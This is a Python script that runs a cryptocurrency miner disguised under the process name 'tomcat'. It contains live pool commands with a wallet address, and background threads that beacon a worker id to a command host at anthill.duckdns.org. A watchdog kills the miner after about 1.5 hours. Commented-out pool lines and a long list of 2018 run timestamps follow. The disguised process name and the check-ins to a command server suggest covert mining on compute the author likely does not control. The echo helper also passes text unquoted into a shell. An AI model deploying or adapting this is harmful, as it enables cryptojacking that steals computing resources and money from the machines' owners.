import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:07.503773
#2018-02-17 16:20:04.333518
#2018-02-17 18:07:07.221395
#2018-02-17 20:18:05.026097
#2018-02-17 22:04:01.378521
#2018-02-17 23:48:06.354556
#2018-02-18 01:37:06.796833
#2018-02-18 03:24:05.061520
#2018-02-18 05:12:03.320067
#2018-02-18 07:03:06.737062
#2018-02-18 08:51:07.137507
#2018-02-18 10:39:03.775657
#2018-02-18 12:24:06.647856
#2018-02-18 14:12:08.009339
#2018-02-18 16:02:06.081620
#2018-02-18 17:52:05.348530
#2018-02-18 19:39:04.672489
#2018-02-18 21:24:05.255976
#2018-02-18 23:13:01.822388
#2018-02-19 00:59:01.648985
#2018-02-19 02:47:01.448363
#2018-02-19 04:33:04.528647
#2018-02-19 06:18:06.296789
#2018-02-19 08:07:07.297693
#2018-02-19 09:57:03.985495
#2018-02-19 11:47:01.565141
#2018-02-19 13:32:09.002509
#2018-02-19 15:21:06.721476
#2018-02-19 17:09:04.248742
#2018-02-19 18:54:05.479804
#2018-02-19 20:33:04.419621
#2018-02-19 22:19:06.485763
#2018-02-20 00:06:04.295732
#2018-02-20 01:52:06.515466
#2018-02-20 03:41:01.825879
#2018-02-20 05:26:06.362875
#2018-02-20 07:10:01.556804
#2018-02-20 08:56:01.520259
#2018-02-20 10:40:01.554235
#2018-02-20 12:25:11.397197
#2018-02-20 14:12:04.779408
#2018-02-20 15:56:06.957447
#2018-02-20 17:43:10.413337
#2018-02-20 19:33:06.150213
#2018-02-20 21:21:06.101799
#2018-02-20 23:05:07.435036
#2018-02-21 00:48:08.651123
#2018-02-21 02:33:06.074512
#2018-02-21 04:22:07.524664
#2018-02-21 06:08:07.302546
#2018-02-21 07:54:06.542350
#2018-02-21 09:39:06.342662
#2018-02-21 11:27:09.380947
#2018-02-21 13:17:02.198288
#2018-02-21 15:02:09.656014
#2018-02-21 16:52:04.531874
#2018-02-21 18:41:09.012493
#2018-02-21 20:27:08.669700
#2018-02-21 22:15:07.513515
#2018-02-22 00:05:09.796982
#2018-02-22 01:54:02.161023
#2018-02-22 03:41:02.008467
#2018-02-22 05:28:01.956604
#2018-02-22 07:12:08.179317
#2018-02-22 09:01:08.275484
#2018-02-22 10:49:05.147800
#2018-02-22 12:35:01.603164
#2018-02-22 14:19:06.355555
#2018-02-22 16:06:05.107450
#2018-02-22 17:52:06.998253
#2018-02-22 19:41:09.136117
#2018-02-22 21:33:05.195067
#2018-02-22 23:21:04.477360
#2018-02-23 01:08:01.552246
#2018-02-23 02:55:06.946986
#2018-02-23 04:41:05.205418
#2018-02-23 06:26:01.916994
#2018-02-23 08:13:07.127785
#2018-02-23 10:31:05.269224
#2018-02-23 12:23:01.583902
#2018-02-23 14:12:01.852051
#2018-02-23 16:02:07.203871
#2018-02-23 17:48:08.625399
#2018-02-23 19:34:06.654906
#2018-02-23 21:17:06.071476
#2018-02-23 23:05:01.433271
#2018-02-24 00:50:07.661332
#2018-02-24 02:43:01.248866
#2018-02-24 04:37:01.714623
#2018-02-24 06:21:02.035566
#2018-02-24 08:08:04.808139
#2018-02-24 09:53:06.009609
#2018-02-24 11:47:06.033113
#2018-02-24 13:39:03.905852
#2018-02-24 15:26:06.779548
#2018-02-24 17:15:08.907865
#2018-02-24 19:08:03.850234
#2018-02-24 20:56:07.431355
#2018-02-24 23:23:04.358064
#2018-02-25 02:48:01.468510
#2018-02-25 05:31:07.008225
#2018-02-25 08:10:07.758227
#2018-02-25 11:41:05.602421
#2018-02-25 14:11:02.140913
#2018-02-25 15:46:01.532431